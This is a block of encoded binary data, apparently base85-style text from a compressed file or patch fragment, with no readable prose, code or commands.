zAiS}3SQit{@cn^aZ2lPC^F6}K5$St&LlVEz%vonVlApG!ZWcx|=efv0t3!@`)WBv# zJ&d#@9<#37y0wMr^RNj%*YQTbqQ!42*ee{hQ6gDcnPB~eqCWW61j3_e`EC*Jd%$%O z5IekeSVIciTZ3`UE%z@14W@Vk1FD;X+viuR9Et$L$Kg*e!@fR=l1r4x+V;x;zhBSg*a`kO*8+i(R}bR!=(JGz5Rq?BWRQdJ-h=p5KMb zqmTFYF=W?Dh5<4-RezO#wFQw`j!1o3uGMk;PJv!f!9q=PQ!Od&8chtXP!rz@1)X$L z(oQ_O^tEo7l*1WRO{=?U5T}SPtXko`BR%XgMEPgvXGKlWZ&rPHJZ%CH8f6~*z$FQ= zUS0H>%f^D;0Dx=#kz?S`cOWw^^d0V(=DhTtl%`s-biP6bUvBj`Tcyz@^V?nQ$wbYV zZJ)k${DBhjTG_%)aAphW1hruTjWM3V3@H?K+97A$96e?Gk6@1cxO^m~Nm1im17p!$ zh7g{3<1K+WO@D37T%65M=b-fCwPFOf}>Y!nqs|U(pgkg8F9ePZU_a+G~<8ThsclVXEeZR?Zw!vZ! z=T>wX-%DI*ZAootDr|z*rscg6LN(*V^yoK|m9U-Z5&g~fWp#J7W7n(xoJ3XzY4l_@ zftEpY(XrGMLZ%K`yE0n}fG)o0lN}hy8W;Q%$y=D2bDNMZ1812F4c<=vXBpwPYHYde7(s z_A??bTynFs!lg)^$h345PaFRv12`~2!Fv;ItS}k$+9EIMR854pBR8%gWn}CdrDld` zYakf!rgf`%&X8EI@72}WkjOfSaPMUy`I&axNzA&+-45CTe$yKr$~yBzZUf|d2b|NRfk z%dsg!^DTT&o;9l@p&nRs6!&|(Fz~z^Mkya(OWy75Ph6C!SxB@q%z%%0V&Li2fhfrn zYWws0#ohnYw}U9~v0?dj*0hPddgh94*w;T@+HN@BDz1W8npyTq!l`iF;JY5VvuF{E z*?^%+IdignGFb{UoVFY4bYB`rJ}+%?R4725ECX_8xoF|}i9e!W;x_v`vXWNs!QE{7 zK4obVC0>m@O#79eF7gS8()dsp8#^A!8C?u!*^!D_JEtDh?GPZv3Zf62UDq5dG-d~W zBfHeIDbk`cd4}gQme*bwQ6DdT%_w*P^IV zW4~=sF+9orym9Cz>}4W5KzpH;#jdmxd_#wNrc?dSMG zO7S+tEc>-_?e45vm)^i~73o2jsmWo?f2O#7&Dqb=Agw3o-D}99m8$uSwkL_gk5iw* z{bd>Y`=6AUpA)?4KY#zkXZDe*NvC+p@^ykVeBNE$3XGZBme*XhtFW+ylyfpS8+FQz zY=XWk4Xs=W7a6o5Pjr2&gV$SD^fO@%ZD1v*M%%T5%kuuXQW<%~Yh~wqD*2%(cAG3CQYdzckOq z18fw;u#(0gRdNq3#7f59iLFT#7LcZNU4VV@-0>Q)-lyhya1=+A(vH8f&@v%@uA#=V z_(%h8rNo$Mf4Rt=+5KuCF92+-XE6k}xNtd`WEC_vv0DtZ3=dnz&;GdP+f!a=81UAw zP{?V=?)N^>SRpK7#(J)`PHkk7fq?D6Rx)RTWUgvi%ZOix4)6Ay%b<48IbO4%r_~22 zP2b&k#;rlLSKsnf?BZ9rs0&J#NP!+(#}>`i7k58*SHR)@3J1t*p}+L`a)cBcSOxFy zRzA@`&`CmeU4?Ob?;LGN1e|(X+cI>@T)qvZT;2-0V7=`y5%onB!!9yLjb5?&#fzl# zBF45HB)_s$QF{Z?HSU!L6@NA^2hExIuLbs;w?6{DpZbpcox^dW{EsB!gYhWR@%al{ zB`Tc^$L`owCLMm57}+D?F!khltWoNxL}UB69fM|b+W}i`zLN-Fmg`E{JRbB2tJrQc zT}Rtf$}r=Vb1xFip?PVt4K8JIf{pQo+D1MdQdSbaY{rpgq4OdwZ3V6U!2%m`DYGZ| zjNd)@1VQS~9V1dMNj89;g3sxncNRL5b>b>qC8f(v$%Dz5XNrV9`$7bmS=4mIY*kVb zy5nF>SbxR+82dy36RY0Yf8C=?`^+(6ZQ(l!d>R?GL>an-Js4a{o1wKeQ(8rLRfK~q z+fR$2O>u>GvZ;BFU(@pQMiOm-R#uz6{{N^t$A?PTu8Y^y#Hl7vwyl#r+3sZ9wr%T# z$+kJ!n2eJqPPXp!_I`M7{0*1(wf9=TmCKa!h5^u9!I|eJAS}bTUTYFUFIG7|8h63E zi$D3KPgU(is`7k{B>cT2uU9qqArXr0ODBmLdZ$fC%UkaV_C|JbL9F@4rQikxpL^J@ zk4PQor=ewJc)c^dckA~X7N2nAA0ELHQw#Z1XhQbc%ZxwNBwb{{yLN=xGr^)IPD6P>GXFK&XV8oe|C z6_lE^>vH4Dl+B3{%^J=W92!s17X{A=$+F~_%^6Vz&Su=gu;N41^)~BEc)&IL&6lqd zkTZ$X>HU)A`QHM?e>PebPLiiX-#r$YKK=YbKSbs@!T;%&@7FHp1hp{rGkt&%^NS!??2Uh+Z4>#p!26$F z5DmOPMdIiPkhV1_R-!4@ql(8k0_a1*0jE3(WPyVQ@gptkQTjma7?Auzj3G$6%8)2$ zpA$3{`HuN_bJPd92k(aRZ;25j@`cxOr-4A8ZX%!`=9^(`wsDA%$d3{*D`XPQ4;E}d z*Th0}!o}2RtH-w_a%O}>3o=n|UAC|EWsL&fbDhN7!u52-TZfp8Zc}=SH;N<26S?I~n8p-m_beX_Sg?rN~kgRx=9z4-~N3~(p)EkL=aqfr@=-Fz( zH=B(Ol}t7%3et;TvLaMYz|}b_*1G2nICw#_zY-IdiX<(^M-YyQf@ACJLaD}PgnK9* z(=DnrZJYrBxnc|Kxb;;p{H(ISWK3NrdJ;vcleRw;(l&UIm~O{p)jDzINBMTR7T9iw zNEoqLxU?IEvAz)HGi*nA;)xBcGrJ({jw$0%%oWv(%1UDEQeY>X zs^8vE!LavBjW~mL=r%X0gF0+RlC&EbCyCExe)pHyyD1G*tUDn|AnC9v1f-(L6GsAs zJbwl`Kh;}{tb^vmJpUf5@~dgy3-Z6$3f~^i?&NRLr4GdZH@1J9Lrqp3h2Gz^CrWeuW^BP*0}eq2;6%;I=Z+AP2hb%Z{8N7h9;Qaa~ z?(Tgq`=MqNG`7sGa2;fkW-h5^6V9^v)Wk#Z_|3sMreIN9dm2t^ z@eUV^rb|;mooMBVE@O)FXKU;cL1<75##EOk#t4~qij4D-l zCHt}~=g(p6mWxO!o$f?>`^Kbh@j&! zSiROhmql1h*h$0!rDEE5hgm{at+q1kzm0lT6CMl=8zzfPR5hy+HE@uc87H4(Q}3oB zA*gb71grOiZAI`9t-7gE-yCKx5pbYJ+(i~kYwtOYBo<`jIo)$mdf)QZk34_@$qAOn zWnGpz*tXS?9b8Me`z8-3-#^z>m7B=p(E|?PR(rI(kg*n! zT(du7z>Z4rdJgddl5b{t2!|312!n z=jYipjDZ=KrakZayKF$z>FT(>hvBGZbU;B?&8%^bSERm2SyV3D$b6EIZb| zZtzCrrN8*jiytcs_f3+{h7dwqTZc57i!csNbVfXEX5lH15Zf`6KD8MIexzkqvmygp z`h~Mwi3BB9Ud-sMtiYtz>CV3frLa`>_JaZ@-KK0i&%#vM_!I_Nf{ZFMg3=br)DcDO zocU4G@$5K7LNh?|Cd-wvpVk4|obCm%gb$AhU z5=koO8ZL#`@NDd&$lp<8bG&g)OJCp6*2wvttlzl8b`r~dQ{)7%?pqnYc#(Gf?pxQi z>xkH&iu)w4JyFflzNFl%e_N+x^a~eqoK&m3Hf5X-y+iGLnduf$Ee^beysWb_mwC(y z3yc#!f{`xj1Vre@!w-sY!(Y{2s)g6{;;DA5`Eicz*wb|J36`GBzvCV@$KvJtQPG7g zPkUc`;*+gA7_4^&F<(?TPf!H#epK=MWuXcJg5ixwVex?MM}q{q@n5WCG|-hYysGKm z?Wlnf;J6gZTc5I=TJ_ow?<@aD$He|WK!pFO9e+a+Jqq3YDU5IVeuhIk%#aMPn2;LE z;4nHaR$>>uEH$#gTG*_G#&$&tZ)vA*n<(bGV519*wnNQlxoS^0!9JEyFAY(dRVE@d zwAAWkg~}M6%s%$ZteY0Frp&g3^#$>~O1*en-;~;7tga^(K_<7+YVotCThp3DLQZ}? z`GhAmW8I{20c%7$I8~H#teh3F7I-^cv~%YFfUsBsufDMc!%Z7KqIl;(SkVoWL8G&m zIjn=Dht}}p02K@Ek4^$RHuE0|sWlzz9lW7CoOZbs`Z1cgcb*GMfXV?;`5kybbm_97y36Q{E6&K1g1PC^{~v?%9Qv zv?%pc8FT}`x}0@x#=XjPel*MuQMQ^1^m=^0J5)cn?`Lec>@uwT;dE>$wqT{P1xS40*?nHxx$zk#YwoO`WJMKiQY>RW>-)oKol%hC4nLzAaQDJcg~6Eo zoHk?g`Ot{H#Q!s$p!_#fSNPAz+{sff=dyI+5o~C$Gcyef=S%U_c zl7k`@P#;}(1?TaV*moeu8ey&C6s^FRX`zJ?G=hxb#PkB|d1 z9vCt$U&)M|!Q?p)OI*s54{O{F?Nk&o>2hgMMUJCdvWXThNsEJ>-+qu5G_%;-jWf}tym~>J4D+mm@7y&0nV@FHzZ{d4>)AEj8oXD5!r;UQbtJ{nIl^0iHkd_ zSm}H{